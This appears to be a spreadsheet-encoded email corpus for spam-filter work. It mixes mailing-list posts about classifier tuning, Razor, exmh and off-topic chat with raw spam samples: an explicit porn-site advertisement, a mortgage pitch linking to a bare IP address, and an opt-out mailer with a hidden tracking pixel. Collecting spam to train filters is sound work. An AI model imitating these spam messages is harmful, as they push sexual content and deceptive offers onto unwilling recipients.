 opular storage products&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;            &lt;img src=3D"http://www.zdn=
 et.com/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"10" alt=
 =3D"" border=3D"0" /&gt;&lt;br /&gt;            &lt;/font&gt;&lt;/td&gt;            &lt;td&gt;&lt;img src=
 =3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width=3D"10" =
 height=3D"1" alt=3D"" border=3D"0" /&gt;&lt;/td&gt;         &lt;/tr&gt;           &lt;/table&gt;=
     &lt;/td&gt;    &lt;/tr&gt;    &lt;tr valign=3D"top"&gt;&lt;td colspan=3D"3"&gt;&lt;img src=3D"http=
 ://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D5 width=3D1&gt;=
 &lt;/td&gt;&lt;/tr&gt;    &lt;tr&gt;&lt;td colspan=3D"7" bgcolor=3D"#999999"&gt;&lt;img src=3D"http://=
 www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D1 width=3D1&gt;&lt;/t=
 d&gt;&lt;/tr&gt;    &lt;/table&gt;    &lt;!-- /### --&gt; &lt;table cellpadding=3D10 border=3D0 cel=
 lspacing=3D0&gt;
 &lt;tr&gt;&lt;td&gt;=20
        =20
                 =20
                =20
                        =20
                                     &lt;a href=3D"http://clickthru.online.com/=
 Click?q=3D6f-3x79IOLAbHArPFw3RXvLF34ULXuR"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://clickthru.online.com/Click?q=3D85-2G2oQ7KQfYG7VnTaf70SVbToBBPR" &gt;&lt;b&gt;New =
 security holes found in Outlook, IE... MS networks your home&lt;/b&gt;&lt;/a&gt;&lt;br&gt;Sec=
 urity experts have discovered two new vulnerabilities in Internet Explorer =
 and Outlook that leave your system open to hack attacks. Plus: MS will soon=
  help you technify your whole house with easy-to-use home-networking gear. =
 &lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;&lt;/table&gt;
          &lt;!--------AD-----------------------------------&gt;
        =20
 &lt;!--------/AD-----------------------------------&gt;
 &lt;br&gt;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e=3D"-1"&gt;&lt;b&gt;&amp;nbsp;JOHN MORRIS AND JOSH TAYLOR&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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ontpage/authors/143.gif" alt=3D"JOHN MORRIS AND JOSH TAYLOR" border=3D"0"&gt;&lt;=
 br&gt;&lt;/td&gt;
                 &lt;td width=3D8&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fr=
 ontpage/b.gif" width=3D"1" height=3D"8"&gt;&lt;br&gt;
                 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D9a-b6_GQTM=
 BGSMss07Figi7yr9FKgnR" &gt;&lt;b&gt;Toshiba's new Pocket PC: Beautiful inside and ou=
 t&lt;/b&gt;&lt;/a&gt;&lt;br clear=3D"all"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/clear.=
 gif" width=3D"1" height=3D"4"&gt;&lt;br clear=3D"all"&gt;
                 Beauty is only skin deep, which is why it's so important th=
 at Toshiba revamped both  body and soul in its Pocket PC e740. Josh and Joh=
 n tell you how the PDA's improved. Plus: The latest reviews on ZDNet.&lt;/font=
 &gt;&lt;/td&gt;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href=3D"http://clickthru.online.com/Click?q=3Daf--dB8QLp=
 qkpZHh87ydDX7NdmUVSeR" &gt;&lt;b&gt;3 tools for viewing any file format under the su=
 n&lt;/b&gt;&lt;/a&gt;&lt;br clear=3D"all"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/clear.=
 gif" width=3D"1" height=3D"4"&gt;&lt;br clear=3D"all"&gt;
                 Got a lot of obscure file formats on your PC? Unimpressed w=
 ith Windows Explorer's ability to view them all? Preston's got three downlo=
 ads that let you see the contents of just about any file--even the ones you=
 've never heard of.&lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/table&gt;&lt;p&gt;
         &lt;P&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;  =20
 &lt;p&gt;
 &lt;hr size=3D1 width=3D"80% noshade align=3D"left"&gt;
 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;
 &lt;div align=3Dcenter&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dc4-Iy9lQ0Ww9YsZNo4kHF6q-jP=
 exAyR" &gt;&lt;b&gt;AnchorDesk Home&lt;/b&gt;&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com=
 /Click?q=3D96-pjdWQtduMsOJkLRjZWSoS2P4Jm4R"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rl_login?email=3Dqqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=3Dzdnet'&gt;free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href=3D'http://clickthru.online.com/Click?q=3Dab-Zc0KrJp=
 xbywKmMrqydP5ntSIwzaBMRRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;|=20
         &amp;nbsp;&lt;a href=3D'http://nl.com.com/servlet/url_login?email=3Dlegit-=
 list-zdnet@spamassassin.taint.org&amp;brand=3Dzdnet'&gt;Manage=20
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href=3D"http://clickthru.online=
 .com/Click?q=3Dc0-kfs-QWP2zt98XJC41H99K8FZuSiR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|=20
         &amp;nbsp;&lt;a href=3D"http://clickthru.online.com/Click?q=3Dd5-p-viQzL1a=
 sEbbjbHCu4jNix1DPPR"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href=3D"http://clickthru.online.com/Click?q=3Dea-fjLyQhV4=
 N6BGQBAAwQ4lAUw-5WnR" &gt;&lt;img src=3D"http://www.zdnet.com/graphics/newsletter=
 s/gl_ft.gif" width=3D75 height=3D43 border=3D0 alt=3D"ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D525&gt;&lt;font face=3D"arial, helvetica" size=3D"-2" color=3D"#fffff=
 f"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D00-4FQlI9QkpoMrLNRbgi4c=
 Hr7W6TiR" style=3D"color: #fff"&gt;Home&lt;/a&gt; |&lt;a href=3D"http://clickthru.onlin=
 e.com/Click?q=3D15-mYP_IGck_o1YJt_AV-hDEc2lRbPR" style=3D"color: #fff"&gt;eBus=
 iness&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=3D2a-CNuWIrIPIvS=
 SgQNabman8WccrYnR" style=3D"color: #fff"&gt;Security&lt;/a&gt; | &lt;a href=3D"http://c=
 lickthru.online.com/Click?q=3D3f-4sAEIqMW45CwpiYHcoh57BymNzeR" style=3D"col=
 or: #fff"&gt;Networking&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=
 =3D54-l6ovIZKAREhP4xu0O9U4lR0vdksR" style=3D"color: #fff"&gt;Applications&lt;/a&gt; =
 | &lt;a href=3D"http://clickthru.online.com/Click?q=3D69-CY-iIoWgGqdD__FMoAH4O=
 pRzLxFR" style=3D"color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href=3D"http://clickthru.=
 online.com/Click?q=3D7e-XDXeInptAgjYFfwi6pURwMpopr9R" style=3D"color: #fff"=
 &gt;Hardware&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=3D93-V4PmQSd=
 QT6H4KNjcTYjvQ8Rgn5rR"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NL=3De501-01&amp;ISSUE=3D2002-07-12" height=3D1 width=3D1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;=
 tr&gt;  &lt;td colspan=3D2&gt;&lt;font face=3DArial, Helvetica, sans-serif size=3D2&gt;   =
  &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;=20
 &lt;IMG HEIGHT=3D1 WIDTH=3D1 SRC=3D"http://clickthru.online.com/Click?q=3Da9-I=
 lqq-AUenP4C8eNB1Y_B5RSLk9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: News.Com: "Linux is a serious competitor," said Ballmer.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/24#When:11:41:50AM
 Date: Tue, 24 Sep 2002 18:41:50 GMT
 News.Com[1]: "Linux is a serious competitor," said Ballmer.
 [1] http://rss.com.com/2100-1001-959165.html?type=pt&amp;part=rss&amp;tag=feed&amp;subj=news
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Porn P.O.: Your 10 free pictures are here!
</t>
  </si>
  <si>
    <t xml:space="preserve">--boundary42
 Content-Type: text/plain; charset="ISO-8859-1"
 Content-Transfer-Encoding: 8bit
 NakedMail is now Porn P.O.!  
 Below is the latest installment of free adult images from Porn P.O. - brand new free pictures!
 Click this link to see the images: http://65.59.170.73/pictures
 The free images this week are sponsored by the following websites:
 Porn Stars Plus - http://www.pornstarsplus.com/pt=pmb8834
 Voted best pornstar site 3 years running.
 XXX Video Plex - http://www.xxxvideoplex.com/pt=pmb8834/
 Over 1 million video streams and more.
 Toon Megaplex - http://www.toonmegaplex.com/pt=pmb8834
 Massive facials and sexy hardcore toon action.
 Past 40 - http://www.past40.com/pt=pmb8834
 Because older ladies really know how to fuck.
 LezboNet - http://www.lezbo.net/pt=pmb8834
 Pussy lickin' good! 225,000 video streams included.
 Internet Eraser - http://www.nakedmail.com/pictures/banners/eraser.html
 YOUR INTERNET USAGE IS BEING TRACKED! Download Internet Erase to protect your privacy.
 ---------------------------
 Also sponsored this week by http://www.dvdxxxvideo.com
 Featuring Mr. 18 inch, midget, squirters
 trannys, grannys and other fine XXX
 videos and dvds. Even East Indian movies!
 ---------------------------
 Thanks for subscribing to Porn P.O. (NakedMail). If you ever want to unsubscribe, click the link below and you will be removed within 48 hours. If the link is temporarily unavailable, reply to this email with the word "unsubscribe" in the subject line.
 ---------------------------------------------------------------------------
 To be unsubscribed from the Porn P.O. mailing list simply click on the link below 
 http://pornpo.com/cgi-bin/smp/s.pl?r=1&amp;l=5&amp;e=jm=:netnoteinc.com
 --boundary42--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: yyyy,Natural Bust - Amazing Breast Enhancing Capsules 
</t>
  </si>
  <si>
    <t xml:space="preserve">[Tim]
 &gt; ...
 &gt; I'd prefer to strip HTML tags from everything, but last time I
 &gt; tried that it still had bad effects on the error rates in my
 &gt; corpora (the full test results with and without HTML tag stripping
 &gt; is included in the "What about HTML?" comment block).  But as the
 &gt; comment block also says,
 &gt;
 &gt; # XXX So, if another way is found to slash the f-n rate, the decision here
 &gt; # XXX not to strip HTML from HTML-only msgs should be revisited.
 &gt;
 &gt; and we've since done several things that gave significant f-n rate
 &gt; reductions.  I should test that again now.
 I did so.  Alas, stripping HTML tags from all text still hurts the f-n rate
 in my test data:
 false positive percentages
     0.000  0.000  tied
     0.000  0.000  tied
     0.050  0.075  lost   +50.00%
     0.025  0.025  tied
     0.075  0.025  won    -66.67%
     0.000  0.000  tied
     0.100  0.100  tied
     0.050  0.075  lost   +50.00%
     0.025  0.025  tied
     0.025  0.000  won   -100.00%
     0.050  0.075  lost   +50.00%
     0.050  0.050  tied
     0.050  0.025  won    -50.00%
     0.000  0.000  tied
     0.000  0.000  tied
     0.075  0.075  tied
     0.025  0.025  tied
     0.000  0.000  tied
     0.025  0.025  tied
     0.050  0.050  tied
 won   3 times
 tied 14 times
 lost  3 times
 total unique fp went from 13 to 11
 false negative percentages
     0.327  0.400  lost   +22.32%
     0.400  0.400  tied
     0.327  0.473  lost   +44.65%
     0.691  0.654  won     -5.35%
     0.545  0.473  won    -13.21%
     0.291  0.364  lost   +25.09%
     0.218  0.291  lost   +33.49%
     0.654  0.654  tied
     0.364  0.473  lost   +29.95%
     0.291  0.327  lost   +12.37%
     0.327  0.291  won    -11.01%
     0.691  0.654  won     -5.35%
     0.582  0.655  lost   +12.54%
     0.291  0.400  lost   +37.46%
     0.364  0.436  lost   +19.78%
     0.436  0.582  lost   +33.49%
     0.436  0.364  won    -16.51%
     0.218  0.291  lost   +33.49%
     0.291  0.400  lost   +37.46%
     0.254  0.327  lost   +28.74%
 won   5 times
 tied  2 times
 lost 13 times
 total unique fn went from 106 to 122
 Last time I tried this (see tokenizer.py comments), the f-n rate after
 stripping tags ranged from 0.982% to 1.781%, with a median of about 1.34%,
 so we've made tons of progress on the f-n rate since then.  But the mere
 presence of HTML tags still remains a significant clue for c.l.py traffic,
 so I'm left with the same comment:
 &gt; # XXX So, if another way is found to slash the f-n rate, the decision here
 &gt; # XXX not to strip HTML from HTML-only msgs should be revisited.
 If we want to take the focus of this away from c.l.py traffic, I can't say
 what effect HTML stripping would have (I don't have suitable test data to
 measure that on).
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Bank of Ireland admits Abbey overtures
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8622123,215/
 Date: 2002-10-07T03:52:53+01:00
 *Business:* Abbey National has received a takeover approach from Bank of 
 Ireland which could flush out other bidders.
</t>
  </si>
  <si>
    <t xml:space="preserve">On Saturday, September 21, 2002, at 10:59 PM, Joseph S. Barrera III 
 wrote:
 &gt; Better yet, tell me where I should be listening for new music now that
 &gt; P2P is dead and I still can't pick up KFJC very well.
 KFJC has a MP3 stream at kfjc.org. I'd also recommend radioparadise.com.
 I remember the Suburban Lawns, but I don't know what became of them.
 Apropos of nothing: "Spirited Away" is amazing. Go see it now.
 -- whump
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] SA and Patented Ideas (was: SA In The News)
</t>
  </si>
  <si>
    <t xml:space="preserve">At 8:43 PM -0700 8/21/02, Ed Greenberg wrote:
 &gt;At 11:19 PM 8/20/2002 -0700, dan@dankohn.com wrote:
 &gt;
 &gt;&gt;The nature of our patent is about putting a warrant mark in RFC 2822
 &gt;&gt;X-headers (or in the body) to allow senders to warrant their mail as
 &gt;&gt;*not-spam*, and then to use copyright and trademark infringement to
 &gt;&gt;enable Habeas to enforce that warranty.
 Why is it that I envision Verisign doing something like this.  Yeah, 
 like I want Verisign to sign all my spam, er, mail for me.  Pay them 
 enough and they'd probably sign spam too. ;)
 J
 -- 
 --
 Justin Shore, ES-SS ES-SSR                Pittsburg State University
 Network &amp; Systems Manager                 http://www.pittstate.edu/ois/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</si>
  <si>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This is due to insufficient write privileges to the "razor-agent.log" 
 file. A quick work-around is to do a "chmod go+rx" on that file (of 
 course, it's better to restrict the access as much as possible).
 In Agent.pm, when the Razor2::Logger object is created, if it doesn't 
 have write permission to the log file it does not succeed. Then, later 
 in the code when the log object is used, it fails with the "unblessed" 
 error.
 Hope this helps,
 Michael Duff
 David Rees wrote:
 &gt;This is my first time running Razor, heard a lot of good things about it so
 &gt;I thought I'd give it a shot.  I also run SpamAssassin so I'd like to
 &gt;integrate the two.
 &gt;
 &gt;I'm not sure if this problem is with SpamAssassin or Razor, so I though I'd
 &gt;shoot the message here first
 &gt;
 &gt;With a freshly installed SpamAssassin 2.41 and Razor 2.14 I'm seeing these
 &gt;messages spit out from spamd:
 &gt;
 &gt;razor2 check skipped: No such file or directory Can't call method "log" on
 &gt;unblessed reference at /usr/lib/perl5/site_perl/5.6.0/Razor2/Client/Agent.pm
 &gt;line 211, &lt;STDIN&gt; line 75.
 &gt;
 &gt;Any ideas?  razor seems to run correctly over the command line.
 &gt;
 &gt;Thanks,
 &gt;-Dave
 &gt;
 &gt;
 &gt;-------------------------------------------------------
 &gt;This sf.net email is sponsored by: OSDN - Tired of that same old
 &gt;cell phone?  Get a new here for FREE!
 &gt;https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
 &gt;_______________________________________________
 &gt;Razor-users mailing list
 &gt;Razor-users@lists.sourceforge.net
 &gt;https://lists.sourceforge.net/lists/listinfo/razor-users
 &gt;  
 &gt;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</si>
  <si>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JJB Sports chief found hanged
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8670380,215/
 Date: 2002-10-08T14:51:59+01:00
 *Business:* Illness and City's mailing of sports empire share are blamed for 
 death.
</t>
  </si>
  <si>
    <t xml:space="preserve">    Date:        Wed, 28 Aug 2002 09:22:34 -0500
     From:        Chris Garrigues &lt;cwg-dated-1030976555.34ad5b@DeepEddy.Com&gt;
     Message-ID:  &lt;1030544555.28815.TMDA@deepeddy.vircio.com&gt;
   | so I'll probably poke around at the sequences performance issues,
 Well, there's this wonderful piece of code in MhSeqExpand ...
     # Hack to weed out sequence numbers for messages that don't exist
     foreach m $rseq {
         if ![file exists $mhProfile(path)/$folder/$m] {
             Exmh_Debug $mhProfile(path)/$folder/$m not found
             set ix [lsearch $seq $m]
             set seq [lreplace $seq $ix $ix]
         } else {
             # Real hack
             break
         }
     }
 which is going to run slow if a sequence happens to start with a bunch
 of messages that don't exist.   I'm not sure why it is important that the
 first message in the sequence returned exists, but not necessarily any
 of the others, but I'm sure glad it is, as MhSeqExpand gets called lots,
 and I don't know if I could cope if it were checking every file in the
 sequences it is looking at, all the time...
 It may help to keep a list of the valid message numbers for the current
 folder (though that would then need to be verified against changes to the
 directory).   Does tcl have a directory read function?   I assume so...
 Mh_Sequence also goes and rereads the files (.mh_sequences and the
 context file) but I'm not sure how frequently that one is called.
   | I'll email anything I figure out since I'm leaving town in less 
   | than 48 hours.
 Have a good vacation.
 kre
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Lenders WILL COMPETE for your mortgage             IVX
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Homeowner,
 Interest Rates are at their lowest point in 40 years!
 We help you find the best rate for your situation by
 matching your needs with hundreds of lenders!
 Home Improvement, Refinance, Second Mortgage,
 Home Equity Loans, and More! Even with less than
 perfect credit!
 This service is 100% FREE to home owners and new
 home buyers without any obligation. 
 Just fill out a quick, simple form and jump-start
 your future plans today!
 Visit http://61.145.116.186/user0201/index.asp?Afft=QM10
 To unsubscribe, please visit:
 http://61.145.116.186/light/watch.asp
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Welcome to OfferClub!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;PRE&gt;
 Dear Valued Member,
 OfferClub would like to thank you for the opportunity to present you
 with valuable offers. You are on this list as you indicated that you
 would like to receive special offers from trusted third parties via
 email from us or one of our marketing partners. We maintain a high
 level of customer satisfaction by ensuring periodically that we are
 presenting third party information that you find important and useful.
 To keep hearing from us every so often DO NOTHING.
 We hope you'll stick around to check out our valuable content, but if
 you do not wish to receive our emails please unsubscribe now by
 clicking &lt;a href="http://www.offerclubmail.com/unsubscribe.php?eid=\~moc.cnietonten^^mj\~1754388\~12a1"&gt;here&lt;/a&gt;.
 Thank you,
 OfferClub 
 --------------------------------------------------------------------------------
 IMPORTANT: If this message was sent to you in error, or if you would
 like to unsubscribe please click the link above or cut and paste the
 following link into a web browser:
 http://www.offerclubmail.com/unsubscribe.php?eid=\~moc.cnietonten^^mj\~1754388\~12a1
 --------------------------------------------------------------------------------
 &lt;/PRE&gt;
 &lt;/HTML&gt;
 &lt;img src="http://www.330w.com/open/open.php?eid=zzzz@spamassassin.taint.org&amp;oid=offer-09102002-TEXT&amp;custid=offerclubmail" border=0 height=0 width=0&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "TP" == Tim Peters &lt;tim.one@comcast.net&gt; writes:
   &gt;&gt; The false positive rate is 0-3%.  (Finally!  I had to scrub a
   &gt;&gt; bunch of previously unnoticed spam from my inbox.)  Both
   &gt;&gt; collections have about 1100 messages.
   TP&gt; Does this mean you trained on about 1100 of each?
 The total collections are 1100 messages.  I trained with 1100/5
 messages. 
   TP&gt; Can't guess.  You're in a good position to start adding more
   TP&gt; headers into the analysis, though.  For example, an easy start
   TP&gt; would be to uncomment the header-counting lines in tokenize()
   TP&gt; (look for "Anthony").  Likely the most valuable thing it's
   TP&gt; missing then is some special parsing and tagging of Received
   TP&gt; headers.
 I tried the "Anthony" stuff, but it didn't make any appreciable
 difference that I could see from staring at the false negative rate.
 The numbers are big enough that a quick eyeball suffices.
 Then I tried a dirt simple tokenizer for the headers that tokenize the
 words in the header and emitted like this "%s: %s" % (hdr, word).
 That worked too well :-).  The received and date headers helped the
 classifier discover that most of my spam is old and most of my ham is
 new.
 So I tried a slightly more complex one that skipped received, data,
 and x-from_, which all contained timestamps.  I also skipped the X-VM-
 headers that my mail reader added:
 class MyTokenizer(Tokenizer):
     skip = {'received': 1,
             'date': 1,
             'x-from_': 1,
             }
     def tokenize_headers(self, msg):
         for k, v in msg.items():
             k = k.lower()
             if k in self.skip or k.startswith('x-vm'):
                 continue
             for w in subject_word_re.findall(v):
                 for t in tokenize_word(w):
                     yield "%s:%s" % (k, t)
 This did moderately better.  The false negative rate is 7-21% over the
 tests performed so far.  This is versus 11-28% for the previous test
 run that used the timtest header tokenizer.
 It's interesting to see that the best descriminators are all ham
 discriminators.  There's not a single spam-indicator in the list.
 Most of the discriminators are header fields.  One thing to note is
 that the presence of Mailman-generated headers is a strong non-spam
 indicator.  That matches my intuition: I got an awful lot of
 Mailman-generated mail, and those lists are pretty good at surpressing
 spam.  The other thing is that I get a lot of ham from people who use
 XEmacs.  That's probably Barry, Guido, Fred, and me :-).
 One final note.  It looks like many of the false positives are from
 people I've never met with questions about Shakespeare.  They often
 start with stuff like:
 &gt; Dear Sir/Madam,
 &gt; 
 &gt; May I please take some of your precious time to ask you to help me to find a
 &gt; solution to a problem that is worrying me greatly. I am old science student
 I guess that reads a lot like spam :-(.
 Jeremy
 238 hams &amp; 221 spams
     false positive: 2.10084033613
     false negative: 9.50226244344
     new false positives: []
     new false negatives: []
     best discriminators:
         'x-mailscanner:clean' 671 0.0483425
         'x-spam-status:IN_REP_TO' 679 0.01
         'delivered-to:skip:s 10' 691 0.0829876
         'x-mailer:Lucid' 699 0.01
         'x-mailer:XEmacs' 699 0.01
         'x-mailer:patch' 699 0.01
         'x-mailer:under' 709 0.01
         'x-mailscanner:Found' 716 0.0479124
         'cc:zope.com' 718 0.01
         "i'll" 750 0.01
         'references:skip:1 20' 767 0.01
         'rossum' 795 0.01
         'x-spam-status:skip:S 10' 825 0.01
         'van' 850 0.01
         'http0:zope' 869 0.01
         'email addr:zope' 883 0.01
         'from:python.org' 895 0.01
         'to:jeremy' 902 0.185401
         'zope' 984 0.01
         'list-archive:skip:m 10' 1058 0.01
         'list-subscribe:skip:m 10' 1058 0.01
         'list-unsubscribe:skip:m 10' 1058 0.01
         'from:zope.com' 1098 0.01
         'return-path:zope.com' 1115 0.01
         'wrote:' 1129 0.01
         'jeremy' 1150 0.01
         'email addr:python' 1257 0.01
         'x-mailman-version:2.0.13' 1311 0.01
         'x-mailman-version:101270' 1395 0.01
         'python' 1401 0.01
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "J" == Jon O &lt;jono@networkcommand.com&gt; writes:
     J&gt; Has anyone considered the fact that these occurrances appear to
     J&gt; be increasing. I'm aware that maybe more publicity surrounding
     J&gt; some and certain agencies have been granted more funding, but
     J&gt; I'd like to see some data which shows if these are increasing
     J&gt; or not.
 I've seen data that shows 1200 rocks (TV-set sized and smaller)
 crashing into the Ottawa skies /every/ /single/ /night/, and that's
 just the background noise.  Plots of that data show us passing through
 hundreds of 'tubes' of debris, each indicative of some other larger
 something out there, only a small handful of which have been
 discovered.  This is without even considering the one's headed this
 way out of the Oort for their First Big Trip.
 One thing you will just have to get used to is hearing news of a
 possible collision; we have only started funding the projects to look
 for these things since Hollywood took an interest with Armageddon, and
 we have only just recently turned on a bunch of new toys to do
 automated sky surveys.  There are also some new (and very clever)
 amateur projects co-ordinating multiple telescopes to detect these
 criters, one of which plans to network dozens of ground based machines
 around the world.  You may remember a few years back the 2028 doomsday
 story -- consider them good ghost stories, then go back to work.
 20,000 years ago, one of them the size of Mt Everest just ever so
 slightly grazed us and left a scar 400km long in the side of South
 America before it scooted out into space.  First nations people would
 have been there then, and it would have seriously ruined their day.
 Orbital elements tell us that our modern technology would have perhaps
 given us 90-min advance warning.   
 The near-miss earlier this month wasn't seen until it was already past
 us; we can't detect rocks on their trip behind the Sun, and when they
 come out slingshot to relativistic speeds, well, it's just too darn
 late to do much of anything about it.  On the inbound trip, even at
 their max full-moon angle, these things are most often magnitude 16 or
 way worse, which is many magnitudes fainter than what you see in the
 deepest dark-skies; no one thought to paint them shiny and white.
 They day before it "hits" my software says NT7 will be magnitude 14 --
 it's easier to see the space station.
 What's worse, the Sun is not a smooth hard spheric marble, it's a
 twisted gelatinous hunk o' hunk o' burnin' love, so the precise warp
 curve of space right near it's backside is (ahem) somewhat problematic
 to compute precisely.  It's also spewing considerable plasma flux in
 all directions, and then there's all these other big gelatinous roaming
 globs (Saturn, Jupiter, Uranus, Neptune) and some significant roaming
 rubble (us), and damn it, they are all spinning too, and most of them
 have a magnetosphere!
 Shit. Forget it.
 Learn to play the banjo. Take peppermint Rye-Kee Shee-At-Zoo relaxation
 therapy and oodles of Ag-nasial I&amp;I-drop suppliments, eat no kind of
 frozen portion, and floss.  Good planets are real hard to find, so
 enjoy the one you got while it's here.  Call your ma. Do an anonymous
 kindness for your better half, another for a total stranger. Having
 all the best toys is useless when they all spontaneously combust from
 a global Wormwood shockwave. You should be diggin' it while it's
 happenin'
 Like, just live your life like there's no tomorrow, ok?  Don't bank on
 being able to redeem yourself later. Yeah, sure, Osama could whack you
 with some nail-coated fuel-air bombs, heck a mis-informed TopGun could
 do it too, but the Good Lord could do it too, with pure, clean and
 galactically EnviroFriendly kinetic energy, and He don't stand in line
 for no Airport Security Check. Hell, fire and brimstone are
 classically given in the reverse order; best to be on the impact side
 of the planet.
 Learn to stop worrying and love the Rock.  Besides, the rats and
 cockroaches will survive, and they already know how to kickstart
 evolution right back into Enrons, WorldComs and Calcuttas.  They even
 have all our wiring and plumbing diagrams and half of our socks.
 Are we going to get hit?  Yup.  
 When?  Every 65 million years and, oh my lord, will you /look/ at the time!
 Where/what/when? Space is pretty big.  Take the largest thing you can
 imagine, double it, and add 10%: That is just the local pancake region
 between us and the Sun. There's the whole rest of the disk of the
 ecliptic and, which is where the NT7 observation came from, it has
 only recently occurred to the meteor hunters to "look up" (or down);
 almost the first shot looking /out/ of the ecliptic disk, and hoo-whee
 there's this big sucker on an "11 tries for a dollar" close encounter
 of the smack-em-good kind.
 This is what I love about astrophysics: we have theories as good as
 anyone else (way better than psychology), and we debate and argue and
 expound and conference and bellow and blurt about them, but every time
 we turn on some new kind of robot sensor device to actually /look/ at
 Reality, well she slaps us right in the face and says in her best Mae
 West "Guess again, boys" -- no other science gets that chance (ok,
 maybe some do) and there is nothing, _nothing_ more worthless than last
 semester's astronomy text.
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
 Business Innovations Through Open Source Systems: http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG-Social] Completely OT, Siamese Cats???
</t>
  </si>
  <si>
    <t xml:space="preserve">I reckon that the Cat[s] will be more interested in the fish in the gaf.
 I've got these huge fish [12inchers currently but still growing].
 I know someone else with them too alonmg with a couple of cats, anyway one
 day the cats sat on top of the tank waiting for the fish to do a swim-by and
 they readied their paws for the kill. Trouble is the fish were also
 interested in a feed and they were significantly faster than the cats. [They
 could'nt actually hurt them as they only eat fish/very small rodents] in the
 wild. But the cats got the fright of their lives and now they just sit
 across the room from the fish warey of approaching the glass ;-)
 Personally I've been bitten many times, but only drew blood once so far.
 I wan't to thank all that replied to my totally OT mail, I never knew that
 so many people were into our wee friends. 
 CW
 -----------------
 On Sat, 20 Jul 2002, kevin lyda wrote:
 &gt; what is this obsession of yours with cats that hunt? 
 not my obsession - evolutions.
 anyway.. i dont like mice and rats, esp. not in the house. and we've
 not had one in the house since we got our present cat.
 &gt; you realise that while cats will sometimes bring birds to your bed,
 &gt; it's the wrong kind of bird...  :)
 :)
 its mostly mice though. and they will eventually (after a few summers)
 stop bringing their kills back to the house, once they realise that
 you're not interested and are never going to learn to hunt.
 (they're trying to teach you hunting basically. they do the same with
 kittens - first bring back kills, and then later they bring back live
 but injured prey for the kittens to practice on).
 although they'll still bring back stuff on occassion.
 &gt; kevin
 --paulj
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] Test spam
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, does anyone have a collection of real-world-spam, that I could use to
 test my setup?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</si>
  <si>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&lt;nettime&gt; The War Prayer
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --- begin forwarded text
 Status: RO
 Date: Mon, 16 Sep 2002 14:57:27 -0700
 To: nettime-l@bbs.thing.net
 From: Phil Duncan &lt;PDuncan@AggregateStudio.com&gt;
 Subject: &lt;nettime&gt; The War Prayer
 Sender: nettime-l-request@bbs.thing.net
 Reply-To: Phil Duncan &lt;PDuncan@AggregateStudio.com&gt;
 The following prayer is from a story by Mark Twain, and was quoted by Lewis
 Laphan in the October issue of Harper's magazine. It occurs at the very end
 of an excellent article which I recommend to you.
 In the story, an old man enters a church where the congregation has been
 listening to an heroic sermon about "the glory to be won in battle by young
